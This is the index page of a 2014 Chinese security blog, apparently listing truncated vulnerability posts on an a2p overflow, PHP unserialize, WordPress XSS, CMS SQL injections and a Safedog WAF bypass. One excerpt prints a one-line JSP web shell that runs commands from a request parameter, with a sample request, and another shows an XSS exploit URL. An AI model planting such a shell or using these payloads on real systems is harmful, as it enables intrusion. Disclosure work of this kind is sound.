usr/bin/a2p buffer overflow

admin 发布于 2014-12-30 08:05
$ echo @alunos.dcc.fc.up|sed 's/^/up201407890/g;s/$/.pt/g' I have found what it appears to be a buffer overflow on the a2p (awk2perl) utility. It comes by default on several diffe...
标签: linux 溢出
评论(0) 浏览(24957)

PHP 5.6.3 unserialize() execute arbitrary code

admin 发布于 2014-12-29 06:35
Description: ------------ Reported by Stefan Esser <stefan.esser@sektioneins.de>: A while ago the function "process_nested_data" was changed to better handle objec...
标签: php unserialize
评论(0) 浏览(15198)

Wordpress Frontend Uploader插件反射型xss

admin 发布于 2014-12-29 06:26
Software Link: https://wordpress.org/plugins/frontend-uploader/ Exploit : http://TARGET/[forntEndUploaderPage]=59&amp;errors[fu-disallowed-mime-type][0][name]=XSS...
标签: wordpress xss
评论(0) 浏览(13144)

WhatsApp<= 2.11.476安卓版远程拒绝服务

admin 发布于 2014-12-29 05:44
特殊字符crash,poc如下  #!/usr/bin/python #-*- coding: utf-8 -* # Title: WhatsApp Remote Reboot/Crash App Android # Product: WhatsApp # Vendor Homepage: http://www.wha...
标签: 安卓 WhatsApp
评论(0) 浏览(14377)

PHPMyWind绕过过滤SQL注入(限定条件)

admin 发布于 2014-12-28 08:11
需要register_globals=on。 /include/common.inc.php 注册变量的代码: foreach(array('_GET','_POST') as $_request) { foreach($$_request as $_k => $_v) { if(st...
标签: sql注入 PHPMyWind
评论(0) 浏览(14767)

齐博CMS注入漏洞

admin 发布于 2014-12-23 04:46
/wei/js.php中 if($type=='hot'||$type=='com'||$type=='new'||$type=='lastview'||$type=='like') { if($f_id) { if(is_numeric($f_id)){ $SQL=...
标签: 注入 齐博CMS
评论(0) 浏览(13228)

phpok sql注入

admin 发布于 2014-12-23 04:36
phpok4.2.083,刚下的 1.safekey固定,导致加密函数可逆 2.使用固定的safekey加密后发起攻击请求,加密内容在代码中解密,绕过了过滤 /install/index.php中 $content = file_get_contents(ROOT."config.php"); //查...
标签: 注入 phpok
评论(0) 浏览(12778)

绕过最新安全狗

admin 发布于 2014-12-21 07:56
最近在做特征的时候发现IPS的检测中往往会有一个最大检测长度,譬如IPS最大检测长度可能于数据包的个数或则数据流的长度有关。于是乎就想着做了个测试,测试安全狗的检测是否也会有长度的限制,于是乎就有了此篇帖子。 测试步骤: 1:使用wamp搭建一个web环境,并且安装最新版本的安全狗,3.1.0.9833. 2:下面就开始测试了,我使用python书...
标签: 过狗 安全狗绕过
评论(0) 浏览(13337)

jsp小后门

admin 发布于 2014-12-18 02:11
一:执行系统命令: 无回显执行系统命令: <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显,用来反弹个shell很方便。 有回显带密码验证的:...
标签: jsp 后门
评论(0) 浏览(13966)

多种方法阻止网站被恶意反向代理

admin 发布于 2014-12-15 13:07
恶意反向代理的危害以及如何阻止网站被方向代理 首先肯定会占用服务器资源,网站打开速度受影响。 其次,别人通过代理盗用你的网站数据,对用户与不是那么智能的搜索引擎而言,相当于建了一个与你一模一样的站点,那么很有可能你的站点会进搜索引擎沙箱,甚至被降权。 如果被恶意代理的页面,还挂有你的联盟广告(比如Adsense),这就十分危险了,如果有人点击了上面...
标签: 反向代理
评论(0) 浏览(15352)

感谢9年的陪伴,江湖再见!!!

标签

热门文章

链接